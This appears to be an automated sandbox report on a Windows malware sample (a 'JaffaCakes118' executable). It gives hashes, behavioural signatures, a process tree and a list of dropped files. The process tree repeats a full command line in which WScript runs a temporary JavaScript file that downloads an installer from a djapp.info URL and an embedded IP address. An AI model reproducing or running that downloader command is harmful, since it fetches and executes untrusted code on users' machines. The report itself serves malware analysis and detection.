Analysis
-
max time kernel
121s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240508-en -
resource tags
arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system -
submitted
26-05-2024 10:58
Static task
static1
Behavioral task
behavioral1
Sample
7541be9044f3a1d7ab258bb36f857a2e_JaffaCakes118.exe
Resource
win7-20240508-en
Behavioral task
behavioral2
Sample
7541be9044f3a1d7ab258bb36f857a2e_JaffaCakes118.exe
Resource
win10v2004-20240226-en
General
-
Target
7541be9044f3a1d7ab258bb36f857a2e_JaffaCakes118.exe
-
Size
184KB
-
MD5
7541be9044f3a1d7ab258bb36f857a2e
-
SHA1
25b38a97fd748ef26874fa390f98597013ef102d
-
SHA256
b42dfb8edbed135a21427c868a0154aea5b04ae8cd7077fe078a297790ecbc19
-
SHA512
40343f0d547e57b4d26f776fd3a1bdf6b791f0ba0e26355968a4c899926cf89e320bc5dbcf72d88ccef5fa145beb099d6a9e4d17320c80ccfbd61c69ea4fbcda
-
SSDEEP
3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3+i:/7BSH8zUB+nGESaaRvoB7FJNndn2
Malware Config
Signatures
-
Blocklisted process makes network request 11 IoCs
flow pid Process 6 2200 WScript.exe 8 2200 WScript.exe 10 2200 WScript.exe 13 2632 WScript.exe 14 2632 WScript.exe 16 2556 WScript.exe 17 2556 WScript.exe 19 2160 WScript.exe 20 2160 WScript.exe 22 1764 WScript.exe 23 1764 WScript.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 20 IoCs
description pid Process procid_target PID 2040 wrote to memory of 2200 2040 7541be9044f3a1d7ab258bb36f857a2e_JaffaCakes118.exe 28 PID 2040 wrote to memory of 2200 2040 7541be9044f3a1d7ab258bb36f857a2e_JaffaCakes118.exe 28 PID 2040 wrote to memory of 2200 2040 7541be9044f3a1d7ab258bb36f857a2e_JaffaCakes118.exe 28 PID 2040 wrote to memory of 2200 2040 7541be9044f3a1d7ab258bb36f857a2e_JaffaCakes118.exe 28 PID 2040 wrote to memory of 2632 2040 7541be9044f3a1d7ab258bb36f857a2e_JaffaCakes118.exe 30 PID 2040 wrote to memory of 2632 2040 7541be9044f3a1d7ab258bb36f857a2e_JaffaCakes118.exe 30 PID 2040 wrote to memory of 2632 2040 7541be9044f3a1d7ab258bb36f857a2e_JaffaCakes118.exe 30 PID 2040 wrote to memory of 2632 2040 7541be9044f3a1d7ab258bb36f857a2e_JaffaCakes118.exe 30 PID 2040 wrote to memory of 2556 2040 7541be9044f3a1d7ab258bb36f857a2e_JaffaCakes118.exe 32 PID 2040 wrote to memory of 2556 2040 7541be9044f3a1d7ab258bb36f857a2e_JaffaCakes118.exe 32 PID 2040 wrote to memory of 2556 2040 7541be9044f3a1d7ab258bb36f857a2e_JaffaCakes118.exe 32 PID 2040 wrote to memory of 2556 2040 7541be9044f3a1d7ab258bb36f857a2e_JaffaCakes118.exe 32 PID 2040 wrote to memory of 2160 2040 7541be9044f3a1d7ab258bb36f857a2e_JaffaCakes118.exe 34 PID 2040 wrote to memory of 2160 2040 7541be9044f3a1d7ab258bb36f857a2e_JaffaCakes118.exe 34 PID 2040 wrote to memory of 2160 2040 7541be9044f3a1d7ab258bb36f857a2e_JaffaCakes118.exe 34 PID 2040 wrote to memory of 2160 2040 7541be9044f3a1d7ab258bb36f857a2e_JaffaCakes118.exe 34 PID 2040 wrote to memory of 1764 2040 7541be9044f3a1d7ab258bb36f857a2e_JaffaCakes118.exe 36 PID 2040 wrote to memory of 1764 2040 7541be9044f3a1d7ab258bb36f857a2e_JaffaCakes118.exe 36 PID 2040 wrote to memory of 1764 2040 7541be9044f3a1d7ab258bb36f857a2e_JaffaCakes118.exe 36 PID 2040 wrote to memory of 1764 2040 7541be9044f3a1d7ab258bb36f857a2e_JaffaCakes118.exe 36
Processes
-
C:\Users\Admin\AppData\Local\Temp\7541be9044f3a1d7ab258bb36f857a2e_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\7541be9044f3a1d7ab258bb36f857a2e_JaffaCakes118.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2040 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1870.js" http://www.djapp.info/?domain=edRAVQlPjP.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf1870.exe2⤵
- Blocklisted process makes network request
PID:2200
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1870.js" http://www.djapp.info/?domain=edRAVQlPjP.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf1870.exe2⤵
- Blocklisted process makes network request
PID:2632
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1870.js" http://www.djapp.info/?domain=edRAVQlPjP.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf1870.exe2⤵
- Blocklisted process makes network request
PID:2556
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1870.js" http://www.djapp.info/?domain=edRAVQlPjP.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf1870.exe2⤵
- Blocklisted process makes network request
PID:2160
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1870.js" http://www.djapp.info/?domain=edRAVQlPjP.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf1870.exe2⤵
- Blocklisted process makes network request
PID:1764
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
Filesize1KB
MD5beba3522cd7eb77a09fe36abcb252a4f
SHA1220cb347af597d4f8aacacff27eb0ce64207e99b
SHA25663c5ec564440d74f3c2c2a161a66a22dbf30b03659f3309419a359ee1f8c0d4e
SHA51235eb19b0e1061370a951b1ca3f66288c6ed1732ce7c94fc663eb3959383e0f5d8fc28b3ab1cb9f5f3cb75a314c3d1a0a62694f51490760ea88e8772916f49774
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464
Filesize724B
MD58202a1cd02e7d69597995cabbe881a12
SHA18858d9d934b7aa9330ee73de6c476acf19929ff6
SHA25658f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5
SHA51297ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
Filesize410B
MD54b1fb413768013dd631ede3aab181222
SHA1facd0b552964de15d0e2a0540be06a16670b67d0
SHA2567a16a37868af6947c2f52dcc9c99150f24e8628428a23b7e25e202d67e71e705
SHA51231c60bda3cf5a789a24a9d14464ee9a6ece38906124abe90e609be9b6e8b1143405f4eaae6f6bf478a0fb0ca25cfebcd0a373434161e4b94b153cc088eb9610e
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD5a1ff7bd0c5e9787f81690bc30a6eec13
SHA1228b30acadb5016ae4b0cf717ec840eecf6b9bd9
SHA2561fb0a1937912e1e264876319f161398a4350dba23bbbc79a09f4b682ced8514b
SHA512199833901108bbcbc9f8b297549570a71460ecbba6e664be13d23345309f1f44bd6f087584169c869d684e97a0a3430da8c791fc6c6c058d9df59a1eb6d06ab8
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464
Filesize392B
MD5c1b8ac3b17618be239b4f86debc28f28
SHA1eae0e49b67aa1f743b9af1eea5dcb13332fa233d
SHA25604e1d65892a09199e2677947ab609e3d408d58bbb33792c7966347d9dc490082
SHA512f361f5ba92b634ad0e853ac4c09013c1d302e71a42d2fea4109ad2bdcfcb5472d35f0895230ac2c66738453d57a8d13505ffa1be2774dde3995462add6eae2bf
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\MNCIS1YI\domain_profile[1].htm
Filesize40KB
MD559c859a8197db9a36286c364ed8e8373
SHA153bb2708ef001021cb91ba7ed03908873e70af15
SHA256180a2924f395fb3b793930aaf261932f29a8fa5d32c956a7bada2a5c4f9745f5
SHA51215e398e5dbd88e2b1e82603ab116ab60e6ab931a1599d1e403b93f70be83fc66c2b56c09e584aa580cc5cfc8029b1a77da27e6c0138e264f36efd6a7c38ed1f9
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\MNCIS1YI\domain_profile[1].htm
Filesize40KB
MD535ac46928fff89ce0e0837e8aed103c1
SHA181212da855e5b1e47f40a0c0a3ebe7bd786d215a
SHA2568e88d51a7d0611bb48bee726000a8127bcb14ea5c0d3322cf0b908dae44080fe
SHA5125afd5b1a123a14f93d82d4996384db898de8e391aa90388e2cadae8f64dbadb440eeeef9393e43e91335d0e0ed65690005992589e292e95f49a0f14ff47d02f8
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\TTL9DZJ3\domain_profile[1].htm
Filesize40KB
MD512757d5e2769c789029997f38aa09933
SHA176381ca1c92cadc1ed5eb9b6ea9ec2c12af9e652
SHA256db74725636e948b4a2f0a926472d01923ea1fe55e9d43f72e7fd6961f9c46c40
SHA5129c43674817f349ef3dff15b8158d010d7291e2c0397a92ae6e7436c2dd33109c2c5efc041c666be31125d2705321f5582f39f38742841bd936b14693400ddd04
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\TTL9DZJ3\domain_profile[1].htm
Filesize40KB
MD59d04e87e950fda23ec57c6cdfb985765
SHA1b5b6a91a006d3d3688224db22a1706d487e1b3cb
SHA256fc83faab1877ca662569a166aa9e8d4eeccfc558d27d58ddf583eea409010c91
SHA512cd1a34b73d7b0fc34a7b22d111e44a59a33b1166ada3755299ccacb854d34e7c3a4565119ba418ef51c2155421d3787dcf30ce5a9ee68c3036f069d13d630d90
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\TTL9DZJ3\domain_profile[1].htm
Filesize40KB
MD558f500f8828bb404119df82c494898aa
SHA147c4d3e529f4c1f125750ebaf3062bb032610538
SHA256b13a79b344e0cf7ac434172cb20858170d2f68fb7b37a1449ba8e6d4d46c7e6c
SHA512c25ab52f0d404da0e376297043f67d0a662d44ebf4436fcf89b6a086840e02dc2b0cda210b91a02e20a1993782ba36907865928338e9142afb3214d3bdbda806
-
Filesize
68KB
MD529f65ba8e88c063813cc50a4ea544e93
SHA105a7040d5c127e68c25d81cc51271ffb8bef3568
SHA2561ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184
SHA512e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa
-
Filesize
177KB
MD5435a9ac180383f9fa094131b173a2f7b
SHA176944ea657a9db94f9a4bef38f88c46ed4166983
SHA25667dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34
SHA5121a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a
-
Filesize
3KB
MD53813cab188d1de6f92f8b82c2059991b
SHA14807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb
SHA256a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e
SHA51283b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76
-
Filesize
177B
MD560f07c205254b5ddb4469ee675650502
SHA1faeca9302a72d23b6b8043e24a5d8a16ea2b116f
SHA2563e4b8b9840ff69f44e1a06deadd2b105809a763b5637b801fa6c2aa656ab260e
SHA51270d96a67fc3bfa8d7957aad95ed2b664388240984e4143339cc818edb58819fa94d3a83e31f1701a98309ea9994b3fbba2c09a6538a3660c33b96edb6e99f18c